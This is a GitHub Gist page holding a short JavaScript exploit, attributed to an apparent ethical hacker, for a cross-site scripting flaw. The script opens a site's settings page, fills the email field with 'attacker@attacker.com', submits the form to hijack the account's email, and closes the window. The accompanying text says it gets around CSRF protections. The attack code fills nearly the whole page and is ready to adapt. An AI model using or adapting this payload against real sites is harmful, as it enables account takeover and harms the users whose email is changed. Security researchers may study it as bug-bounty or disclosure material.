Skip to content

Instantly share code, notes, and snippets.

@shawarkhanethicalhacker

shawarkhanethicalhacker/email_change_exploit_xss.js

Created September 14, 2018 20:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save shawarkhanethicalhacker/996a4bc19d2d06f6bbac5d614ce65c66 to your computer and use it in GitHub Desktop.
Save shawarkhanethicalhacker/996a4bc19d2d06f6bbac5d614ce65c66 to your computer and use it in GitHub Desktop.
Download ZIP
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
Raw
email_change_exploit_xss.js
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load',
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
setTimeout(function() { // just for delay and closing
dark_window.close();
}, 10000);
}, true);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment